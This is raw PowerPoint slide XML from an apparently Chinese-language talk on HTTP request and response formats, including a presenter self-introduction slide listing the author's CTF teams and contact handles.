            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F43F3EC-F3C8-4D40-BFEB-6BE56DAA9DA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98691" y="1654432"/>
            <a:ext cx="11653697" cy="5142608"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702CA016-61C2-4641-9578-370F3F278D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="398691" y="6294120"/>
            <a:ext cx="4950549"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形标注 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{731D7F16-6919-5448-A6EF-CED90CE45895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5349240" y="5212080"/>
            <a:ext cx="1661160" cy="975360"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>请求主体</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="174221570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58520" y="187960"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求包格式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265B752D-5167-E443-A63A-DC63C2717B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624840" y="921196"/>
            <a:ext cx="2118360" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>响应</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EED6529B-38F7-A147-96EC-1371D3E58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520" y="1382861"/>
            <a:ext cx="9398000" cy="5435600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="椭圆形标注 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{731D7F16-6919-5448-A6EF-CED90CE45895}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8382000" y="3351942"/>
            <a:ext cx="1661160" cy="975360"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>响应主体</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702CA016-61C2-4641-9578-370F3F278D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858520" y="4693920"/>
            <a:ext cx="9123680" cy="2164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线连接符 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41A70759-E236-D841-A916-6ACEF72233A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="858520" y="1615440"/>
            <a:ext cx="16103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椭圆形标注 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69183B5D-6C9F-984F-8005-68B61BB09192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="528563"/>
            <a:ext cx="2508250" cy="975360"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeEllipseCallout">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A6ED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s" altLang="en-US" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>协议、状态码</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="396314211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7152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387" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>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791510" y="3455192"/>
            <a:ext cx="2841863" cy="3416332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="组合 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3766430" y="1079555"/>
            <a:ext cx="988629" cy="988629"/>
            <a:chOff x="3059832" y="3339719"/>
            <a:chExt cx="3607562" cy="3607562"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="椭圆 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3059832" y="3339719"/>
              <a:ext cx="3607562" cy="3607562"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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17307F"/>
                </a:solidFill>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="同心圆 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3168202" y="3448089"/>
              <a:ext cx="3390826" cy="3390826"/>
            </a:xfrm>
            <a:prstGeom prst="donut">
              <a:avLst>
                <a:gd name="adj" fmla="val 4879"/>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17307F"/>
                </a:solidFill>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3766432" y="2600581"/>
            <a:ext cx="988629" cy="988629"/>
            <a:chOff x="3059832" y="3339719"/>
            <a:chExt cx="3607562" cy="3607562"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="椭圆 25"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3059832" y="3339719"/>
              <a:ext cx="3607562" cy="3607562"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">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17307F"/>
                </a:solidFill>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="同心圆 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3168202" y="3448089"/>
              <a:ext cx="3390826" cy="3390826"/>
            </a:xfrm>
            <a:prstGeom prst="donut">
              <a:avLst>
                <a:gd name="adj" fmla="val 4879"/>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17307F"/>
                </a:solidFill>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="组合 27"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3705108" y="4152614"/>
            <a:ext cx="4637183" cy="988629"/>
            <a:chOff x="3974544" y="2684388"/>
            <a:chExt cx="3477888" cy="741472"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="29" name="组合 28"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3974544" y="2684388"/>
              <a:ext cx="741472" cy="741472"/>
              <a:chOff x="3059832" y="3339719"/>
              <a:chExt cx="3607562" cy="3607562"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="35" name="椭圆 34"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3059832" y="3339719"/>
                <a:ext cx="3607562" cy="3607562"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">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17307F"/>
                  </a:solidFill>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36" name="同心圆 69"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3168202" y="3448089"/>
                <a:ext cx="3390826" cy="3390826"/>
              </a:xfrm>
              <a:prstGeom prst="donut">
                <a:avLst>
                  <a:gd name="adj" fmla="val 4879"/>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17307F"/>
                  </a:solidFill>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:latin typeface="Arial" panose="020B0604020202020204"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="+mn-ea"/>
                  <a:sym typeface="Arial" panose="020B0604020202020204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="TextBox 19"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4480502" y="3112201"/>
              <a:ext cx="2971930" cy="240276"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr vert="horz" wrap="square" lIns="480000" tIns="0" rIns="0" bIns="0" anchor="ctr" anchorCtr="0">
              <a:normAutofit/>
            </a:bodyP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17307F"/>
                </a:solidFill>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="矩形 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="699152" y="469055"/>
            <a:ext cx="3278488" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1245235">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="5400" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>个人简介</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="5400" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="17307F"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Rectangle 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="885644" y="1394393"/>
            <a:ext cx="2724605" cy="6440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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" b="0" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="17307F"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>INTRODUCTION</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0" kern="0">
              <a:solidFill>
                <a:srgbClr val="17307F"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7671B70-88E0-9642-9B28-C4E00F3DB074}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3610249" y="1701192"/>
            <a:ext cx="5210712" cy="4822923"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   ：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>zzm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>学校：天津大学研二</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>战队：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Eur3kA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JD-r3kapig</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>公司：腾讯</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>微信：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sakuras2333</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>QQ</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> ：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>541395961</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2600">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>博客：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-Hans" sz="2600" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>http://zzm.cat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2600">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="112748627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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="2" presetClass="entr" presetSubtype="2"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1+#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58520" y="187960"/>
            <a:ext cx="5367020" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-Hans" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-Hans" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>请求包格式</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{265B752D-5167-E443-A63A-DC63C2717B19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="624840" y="921196"/>
            <a:ext cx="2118360" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400" b="1">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>请求头</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{965961D1-5012-5645-9ED0-E160B3D7FA4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036320" y="1524000"/>
            <a:ext cx="10043160" cy="1569660"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-Hans" altLang="en-US" sz="2400">
